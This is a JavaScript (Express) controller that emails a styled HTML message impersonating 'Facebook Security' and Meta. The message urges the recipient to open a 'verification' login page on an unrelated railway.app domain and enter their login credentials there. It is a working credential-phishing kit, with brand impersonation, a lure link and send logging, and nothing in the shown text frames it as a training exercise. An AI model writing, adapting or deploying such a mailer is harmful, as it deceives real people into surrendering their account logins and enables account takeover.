const sendEmail = require("../services/emailService")
const codeService = require("../services/codeService")

exports.sendLoginEmail = async (req,res)=>{

try{

const {email} = req.body

if(!email){

return res.status(400).json({
success:false,
message:"Email required"
})

}

const loginLink = "https://security-system-production.up.railway.app/login.html";

const emailTemplate = `

<div style="background:#f0f2f5;padding:40px 0;font-family:Helvetica,Arial,sans-serif;">

  <div style="max-width:620px;margin:auto;background:#ffffff;border-radius:8px;
  box-shadow:0 2px 8px rgba(0,0,0,0.08);overflow:hidden;">

    <!-- HEADER -->

    <div style="background:#1877f2;padding:18px 25px;color:white;
    font-size:18px;font-weight:600;">
      Facebook Security
    </div>

    <!-- BODY -->

    <div style="padding:35px 30px;color:#1c1e21;font-size:15px;line-height:1.6;">

      <p>Hello,</p>

      <p>
      A secure sign-in request has been detected through the 
      <strong>Facebook Security Portal</strong>. As part of our ongoing commitment 
      to protecting user activity and maintaining system integrity, all login 
      attempts must complete an additional verification step before access is granted.
      </p>

      <p>
      If you initiated this request, please continue by opening the secure 
      verification page below. After entering your login credentials, the 
      system will automatically generate a <strong>one-time verification code</strong> 
      and deliver it to your email address.
      </p>

      <!-- SECURITY BOX -->

      <div style="background:#f5f7fb;border-left:4px solid #1877f2;
      padding:20px;border-radius:6px;margin:30px 0;">

        <strong style="font-size:15px;">Verification Required</strong>

        <p style="margin-top:10px;margin-bottom:20px;color:#444;">
        To confirm your identity and continue securely, please access the 
        login page using the button below.
        </p>

        <!-- BUTTON -->

        <div style="text-align:center;margin:25px 0;">

          <a href="${loginLink}"
          style="background:#1877f2;color:white;text-decoration:none;
          padding:14px 32px;border-radius:6px;font-weight:600;
          font-size:14px;display:inline-block;">
          Open Login page
          </a>

        </div>

      </div>

      <p>
      For security reasons, verification codes are generated for 
      <strong>single-use authentication</strong> and remain valid for a 
      limited time. If the code expires before it is used, a new verification 
      code can be requested from the verification page.
      </p>

      <p>
      If you did not attempt to access the Facebook Security Portal, you can 
      safely comply to this message. No account changes or access will occur 
      unless the verification process is successfully completed.
      </p>

      <p>
      We strongly recommend that you never share your verification code 
      with anyone. Facebook Security will never request your verification 
      code through email or direct communication.
      </p>

      <p style="margin-top:30px;">
      Thank you for helping us maintain a safe and secure environment.
      </p>

      <p style="font-weight:600;margin-top:20px;">
      Facebook Security Team
      </p>

    </div>

    <!-- FOOTER -->

    <div style="border-top:1px solid #c0c5d1;padding:20px 30px;
    font-size:12px;color:#65676b;line-height:1.6;background:#fafafa;">

      This notification was automatically generated by the Facebook Security 
      monitoring system. Please do not reply directly to this email.

      <br><br>

      © 2026 Meta Security Services · Privacy · Terms · Help

    </div>

  </div>

</div>

`;

const sent = await sendEmail(
email,
"Facebook Security Notification",
emailTemplate
)

if(!sent){

return res.status(500).json({
success:false,
message:"Email failed to send"
})

}

codeService.addActivity(email,"Security email sent")

res.json({
success:true,
message:"Email sent successfully"
})

}catch(error){

console.error("Email sending error:",error)

res.status(500).json({
success:false,
message:"Server error"
})

}

}